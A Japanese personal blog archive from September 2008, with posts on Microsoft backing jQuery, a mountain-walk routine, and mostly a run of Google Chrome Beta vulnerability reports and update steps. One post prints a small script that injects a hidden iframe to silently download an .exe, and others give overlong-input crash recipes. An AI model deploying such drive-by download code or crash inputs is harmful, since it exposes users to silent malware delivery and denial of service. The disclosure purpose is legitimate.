« 2008年8月 | トップページ | 2008年10月 »

2008年9月30日 (火)

Microsoft, jQuery対応を推進

Microsoft,オープンソースJavaScriptライブラリ「jQuery」対応を推進

へぇ~、と思った記事でした。

jQueryは軽量で使いやすいJavaScriptフレームワークなのでボクもWEBアプリ開発ではよく利用しています。特に最近はjQuery UIを好んで使ってます。

MSがjQuery提供を決めた理由としては、Scott Guthrieのブログに

Providing the ability to perform selection and animation operations like above is something that a lot of developers have asked us to add to ASP.NET AJAX, and this support was something we listed as a proposed feature in the ASP.NET AJAX Roadmap we published a few months ago.

とあるので、開発者からの要望が強かったからのようです。
あと、jQueryがJavaScriptフレームワークのスタンダードになりつつあるという現状認識もあるように見えます。

MSだったらこういうフレームワークは自社で作るとか、Extみたいな見た目リッチなのと組みそうな感じがしてたんですが、より開発者好みなjQueryを選んだっていうのはちょっと意外な感じがしました。いろんな評価があるとは思いますが、ボクとしては好ましいと感じます。

なんだかんだいって、ASP.NETはWebアプリの開発環境としては非常にパワフルです。
オープンソース好きな人はあまりご存じないかもしれませんが、Visual StudioでのASP.NET開発はとても洗練されていて高機能なWebアプリが高速に開発できる環境が準備されています。

その中でjQueryのように多くの人が使っているフレームワークが利用できるとなると、オープンソース側のJavaScript書きが.NET開発に参加できるのでおもしろいことになるかもしれません。というか、MSにはそういう狙いがあるのかもしれませんね。

今後のMSの「オープンソース推進」の動向も、ちょっと気になりはじめました。

| | コメント (0) | トラックバック (0)

2008年9月23日 (火)

山登り

Abcd0002

以前から、外出のない平日は近くの山に登っています。
仕事がら運動不足になりやすいですからね。

山頂の神社まであがってお参りしてから、広場で太極拳をやって下山。
昼ごはん前に、だいたい1時間くらいです。
涼しくなってきたので登りやすくなってきました。
うっとおしい蚊もだいぶ少なくなったし。

今日は、とても天気がいいので山頂で写真を撮ってみました。
神戸空港まで一望できます。汗をかいて山の緑や空の青をみるのはなかなか気分がいいもんです。

この山登り。最近仕事にもいい感じなのに気づきました。
プログラミングとかで連日煮詰まっているときなどに、気持ちがリフレッシュできて新しいアイデアが浮かんだりもします。

頭の中のキャッシュをクリアできる感じですね。
午前と午後の気持ちの切り替えにもなるし、リズムができていいです。

やっぱり画面ばかり眺める生活だと、なんか不規則で仕事も効率が悪くなりがちです。
仕事のためにも、山登りはずっと続けようと思います。

| | コメント (0) | トラックバック (0)

2008年9月 8日 (月)

Google Chrome Beta を最新版にアップデートしてみる

先日から脆弱性の報告ばかりしましたが、今日は脆弱性の対応方法を紹介します。
Google Chrome Betaを最新版にアップデートする方法です。

Google Chrome Betaのアップデートは自動では行われません。手動でやります。
発表時のバージョンは0.2.149.27でしたが、この記事を書いている時点の最新版は0.2.149.29です。

手動アップデートのやり方は以下のとおりです。

まず、スパナの形のアイコンから「Google Chromeについて」を選択します。

1

Google Chromeについてのダイアログが表示されます。
ダイアログの左上の部分にバージョンが記載されています。この時点ではまだ0.2.149.27ですね。ダイアログの一番下を見ると、新しいバージョンが利用できるというメッセージがあります。その右側の「今すぐアップデート」ボタンをクリックします。

2

ボタンをクリックすると、新しいバージョンのインストールが始まりますのでしばらく待ちます。

3

インストールが完了すると、Google Chromeの再起動を求められます。
開いているダイアログをOKで閉じてからGoogle Chromeを終了して、また起動します。

4

Google Chromeが起動した後、「Google Chrome について」を開いてみると、最新版の0.2.149.29になっています。

5

以上バージョンアップのやり方は簡単ですが、Firefoxのようにブラウザ起動に「最新版がリリースされました」みたいなお知らせが出ないので、ちょくちょくGoogle Chromeについてをチェックする必要があるみたいですね。

0.2.149.29になって、セキュリティホールが埋まったかな?と思い先日から報告している件をざっと試してみたところ、全部修正されていました。なかなか速い対応でちょっと安心しました。

しかし、イレギュラーな操作を何回も繰り返すとブラウザが不安定になったりすることがまだあります。まだまだ改善の余地はありそうですね。

Googleのアップデートの対応が早いことがわかったのでまた不具合を見つけたら報告しようと思います。
早く安心して使えるようになってほしいですからね^^

| | コメント (0) | トラックバック (0)

2008年9月 6日 (土)

Google Chrome Beta にCSSの不正な記述でクラッシュするセキュリティホール

先ほどの記事の追記です。

単純な応用ですが、CSSで記載した場合でも同様の問題が発生しました。
CSSでbodyやliなどのbackgroundの画像指定に非常に長いURLを指定し、要素の検証でインスペクタを開いて、問題のElementを選択した瞬間、Chromeがクラッシュします。

4

まあ、前回のやつから容易に想像できる現象なんですが、これでインスペクタのURLの扱い自体に問題がある可能性が高いことが判りました。
それが判るだけでも様々な悪用に発想を展開できるわけで、イカンのです。

繰り返しになりますが、こういう問題には早急にパッチ配布なりバージョンアップなりで対応してほしいです。

| | コメント (0) | トラックバック (0)

Google Chrome Beta 不正に記述されたimgタグで要素の検証を実行するとクラッシュするセキュリティホール

さて、昨日はもう書かないと書きましたが、自分で脆弱性を発見してしまったので最後の最後にそれを書いておこうと思います。

imgタグのsrcに非常に長いURLが記述されたページに、Google Chrome 0.2.149.27 でアクセスし、右クリックしてサブメニューから 要素の検証 を実行すると、Chromeはクラッシュし、再起動を促す警告ダイアログが表示されます。

1

2_2

テストではsrcに31132バイトのURLを記述することで発生しました。
Chromeブラウザ側では 414 Request-URI Too Large として処理されているようです。
インスペクタの表示後にクラッシュしているし、要素の検証で使われるインスペクタの処理に問題があるのかもしれません。

3

上記のように、Chromeが応答しなくなるパターンもありました。

この現象はGoogleに報告しておきました。

もう細かいのは書かないけど、Chromeのバグチェックは今後もしていきたいと思います。
重大っぽいのや、自分で見つけたものはまた書くかも。

[追記:記事を書いた15分後]
今セキュリティサイトをチェックしたら、同様の報告が上がっていました。
この問題はimgタグだけでなく、他のElementでも発生するようです。

| | コメント (0) | トラックバック (0)

Google Chrome Beta 不正に記述されたサイトを保存しようとすると強制終了するセキュリティホール

さて、今日も報告を見つけたので一筆。

Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit

titleタグが非常に長い場合、そのページをGoogle Chrome 0.2.149.27で名前を付けてページを保存しようとすると、Google Chromeは何の表示もなしに強制終了します。

この脆弱性で、攻撃者はGoogle Chromeユーザーのシステム上で任意のコードを実行可能だそうです。それは怖い。

HTMLでバッファオーバーフローとは。。。

まだまだ似たような脆弱性が出てきそうですが、もうブログに掲載するのやめようと思います。
気乗りがしなくなりました。

もうちょっと明るいネタが書きたいですw

| | コメント (0) | トラックバック (0)

2008年9月 5日 (金)

Google Chrome Beta に不正なHTTPヘッダでブラウザが強制終了するセキュリティホール

さて、今日もGoogle Chrome Bataの脆弱性のネタを見つけたので書いておきます。

Google Chrome 0.2.149.27 (1583) Silent Crash PoC

アクセスしたサイトにContent-Dispositionヘッダが含まれている場合、Content-Dispositionのfilenameが非常に長いと、Google Chrome Betaは何の表示もなく終了します。エラーも出力しません。

あえてサンプルコードは掲載しませんが、検証したコードではfilenameが6604バイトのデータでChromeはきれいに落ちました。

念のためにIE6、Firefox3.1でサンプルコードを実行してみましたが、もちろん落ちたりしませんでした。

修正が待ち望まれます。

| | コメント (0) | トラックバック (0)

2008年9月 4日 (木)

Google Chrome Beta にページを表示しただけで自動的にファイルをダウンロードしてしまうセキュリティホール

さて、今日はGoogle Chromeのレビューを書くつもりだったんですが、昨日に引き続きまたもセキュリティホールの報告を発見してしまったので、先にそっちを書きます。

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

というわけで、Google Chrome 0.2.149.27 でユーザーに警告することなく自動的にファイルをダウンロードしてしまうセキュリティホールです。
細工を施されたページにアクセスするだけで、Google Chromeはユーザーに警告を表示することもなく、自動的にファイルをダウンロードしてしまいます。

Ws000044

ダウンロードされたファイルは、規定ではマイドキュメントの"ダウンロード"フォルダに保存されます。

Ws000045

マルウェアを知らないうちにダウンロードさせられて、うっかり実行してしまうかもしれない危険性がありますね。

この現象は以下のコードによって実現されます。

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

IFRAMEの扱いに問題があるみたいですが。。。
ちょっとこれは単純すぎるんじゃないでしょうか(^^;;

Beta版だからと言われればそれまでですが、IE、Firefoxといった現行のブラウザのセキュリティレベルを考えると、Google Chromeはまだまだ釣り合っていないのかなあ。と思ってしまいます。Google DocsやGMailを使うときには便利だし、起動も速いのでいいなぁと思っていましたが、まだまだ安心して実用できるものじゃないですね。

こういったセキュリティホールやバグはまだまだたくさん出てきそうです。なんだかIE3.0、4.0あたりの時代を思い出します。これについてはGoogleがどこまで素早く対応するかで勝負が決まると思います。「穴があるけどすぐ塞がる」というのはユーザーにギリギリですが安心感を与えますからね。

逆に、長い間不具合を放置しておいてなかなかパッチをリリースしない、ということではどんどんユーザーが離れていってしまい、最終的に品質が良くなったとしてももう見向きもされない。ということになり兼ねません。

昨日に引き続き、Googleがどう対応していくか楽しみです。

| | コメント (0) | トラックバック (1)

2008年9月 3日 (水)

Google Chrome Beta に不正なリンクでクラッシュするセキュリティホール

さて、本日発表されたGoogle Chrome
朝からテレビのニュースで紹介されているなど思ってた以上の話題性で登場していますが、さすがに世界のクラッカー達の注目も集めていた模様。さっそくセキュリティホールが報告されています。

Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability
というわけで、現在リリースされているGoogle Chrome バージョン0.2.149.27で不正に記述されたリンクにアクセスしようとするとブラウザがクラッシュし、再起動を求められます。ブラクラというやつですね。

20080803001

元記事は以下。アクセスは自己責任でお願いします。
http://evilfingers.com/advisory/google_chrome_poc.php
上記URLはアクセスしただけではChromeはクラッシュしません。
サイト下に掲載してある「Click for a demo HERE」のボタン部分にカーソルを合わせるとクラッシュします。

ChromeのURLを解析する処理に脆弱性が存在すると推測されます。カーソルを合わせただけでクラッシュしてしまうのは、ChromeがURLにアクセスする前に何らかの検証処理を行うからでしょう。Chromeのアドレスバーに脆弱性を突くURLを直接入力しても同じようにクラッシュしました。
当然ですが、悪用はしないで下さいね。

これ自体はとても単純なバグなのですぐ修正されるかと思います。
しかし、速いですね。0day hackですね。
今後もちらほらChromeの脆弱性は報告されていくでしょう。

さて、朝からChromeのネタを書くためにスクリーンショットをパチパチ撮ってました。
前後逆な感じになりましたが、次回は「Google Chromeをインストールしてみた」を書きたいと思います。

| | コメント (2) | トラックバック (0)

« 2008年8月 | トップページ | 2008年10月 »